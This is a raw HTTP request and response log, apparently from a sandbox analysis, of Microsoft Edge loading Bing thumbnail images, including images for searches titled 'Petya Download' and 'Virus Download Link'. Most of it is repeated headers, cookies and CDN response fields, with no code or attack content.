cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 3961
x-check-cacheable: YES
cache-control: public, max-age=4931283
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_MISS from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c58
-
GEThttps://th.bing.com/th?q=Petya+Download&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1msedge.exeRemote address:92.123.128.169:443RequestGET /th?q=Petya+Download&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 979
cache-control: public, max-age=1209557
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_MISS from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c47
x-check-cacheable: YES
-
GEThttps://th.bing.com/th?q=Virus+Download+Link&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1msedge.exeRemote address:92.123.128.169:443RequestGET /th?q=Virus+Download+Link&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 10697
cache-control: public, max-age=1209593
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_MISS from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c4b
x-check-cacheable: YES
-
GEThttps://th.bing.com/th?id=ODLS.be5017b0-b045-4a18-bcc7-e982036597e0&w=32&h=32&qlt=94&pcl=fffffa&o=6&pid=1.2msedge.exeRemote address:92.123.128.169:443RequestGET /th?id=ODLS.be5017b0-b045-4a18-bcc7-e982036597e0&w=32&h=32&qlt=94&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 4132
x-check-cacheable: YES
cache-control: public, max-age=956928
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_MISS from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c4c
-
GEThttps://th.bing.com/th?id=ODLS.998e508e-77a2-4745-89dd-afc5d29468e1&w=32&h=32&qlt=95&pcl=fffffa&o=6&pid=1.2msedge.exeRemote address:92.123.128.169:443RequestGET /th?id=ODLS.998e508e-77a2-4745-89dd-afc5d29468e1&w=32&h=32&qlt=95&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 6782
x-check-cacheable: YES
cache-control: public, max-age=324869
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_MISS from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c4e
-
GEThttps://th.bing.com/th?id=ODLS.2acc523d-5e45-4766-b29b-968f9adc60df&w=16&h=16&c=7&o=6&pid=1.7msedge.exeRemote address:92.123.128.169:443RequestGET /th?id=ODLS.2acc523d-5e45-4766-b29b-968f9adc60df&w=16&h=16&c=7&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 6248
x-check-cacheable: YES
cache-control: public, max-age=435571
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_MISS from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c51
-
GEThttps://th.bing.com/th?id=ODLS.c7d54ab5-176a-431d-ab18-1bfc7ead56b3&w=16&h=16&c=7&o=6&pid=1.7msedge.exeRemote address:92.123.128.169:443RequestGET /th?id=ODLS.c7d54ab5-176a-431d-ab18-1bfc7ead56b3&w=16&h=16&c=7&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 7969
x-check-cacheable: YES
cache-control: public, max-age=341894
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_MISS from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c52
-
GEThttps://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=16&h=16&c=7&o=6&pid=1.7msedge.exeRemote address:92.123.128.169:443RequestGET /th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=16&h=16&c=7&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 3111
x-check-cacheable: YES
cache-control: public, max-age=4706783
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_MISS from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c55
-
GEThttps://th.bing.com/th?id=ODLS.8e7e59ef-b994-4f32-aa65-a853f1a07e79&w=18&h=18&o=6&pid=AdsPlusmsedge.exeRemote address:92.123.128.169:443RequestGET /th?id=ODLS.8e7e59ef-b994-4f32-aa65-a853f1a07e79&w=18&h=18&o=6&pid=AdsPlus HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1469
x-check-cacheable: YES
cache-control: public, max-age=2481048
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_MISS from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c5d
-
GEThttps://th.bing.com/th?id=ODLS.2eb3a562-e68d-4b64-8755-6c06140f4654&w=18&h=18&o=6&pid=AdsPlusmsedge.exeRemote address:92.123.128.169:443RequestGET /th?id=ODLS.2eb3a562-e68d-4b64-8755-6c06140f4654&w=18&h=18&o=6&pid=AdsPlus HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 457
x-check-cacheable: YES
cache-control: public, max-age=1368644
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_MISS from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c5e
-
GEThttps://th.bing.com/th?id=ODLS.09fb117b-0983-425f-90e9-6b4651f9273c&w=20&h=20&o=6&pid=SANGAMmsedge.exeRemote address:92.123.128.169:443RequestGET /th?id=ODLS.09fb117b-0983-425f-90e9-6b4651f9273c&w=20&h=20&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1570
cache-control: public, max-age=1881281
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_HIT from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c7f
x-check-cacheable: YES
-
GEThttps://th.bing.com/th?id=ODLS.10d2eace-0368-4f5e-b697-8a38196d7f38&w=20&h=20&o=6&pid=SANGAMmsedge.exeRemote address:92.123.128.169:443RequestGET /th?id=ODLS.10d2eace-0368-4f5e-b697-8a38196d7f38&w=20&h=20&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1272
cache-control: public, max-age=667792
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_HIT from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c80
x-check-cacheable: YES
-
GEThttps://th.bing.com/th?id=OSK.afde16707eea1f9685bc3189e85ce9f7&w=80&h=80&c=7&o=6&pid=SANGAMmsedge.exeRemote address:92.123.128.169:443RequestGET /th?id=OSK.afde16707eea1f9685bc3189e85ce9f7&w=80&h=80&c=7&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1629
cache-control: public, max-age=414560
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_HIT from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c81
x-check-cacheable: YES
-
GEThttps://th.bing.com/th?id=OSK.497dc2afcba293e8d41462e529a6f0ac&w=80&h=80&c=7&o=6&pid=SANGAMmsedge.exeRemote address:92.123.128.169:443RequestGET /th?id=OSK.497dc2afcba293e8d41462e529a6f0ac&w=80&h=80&c=7&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
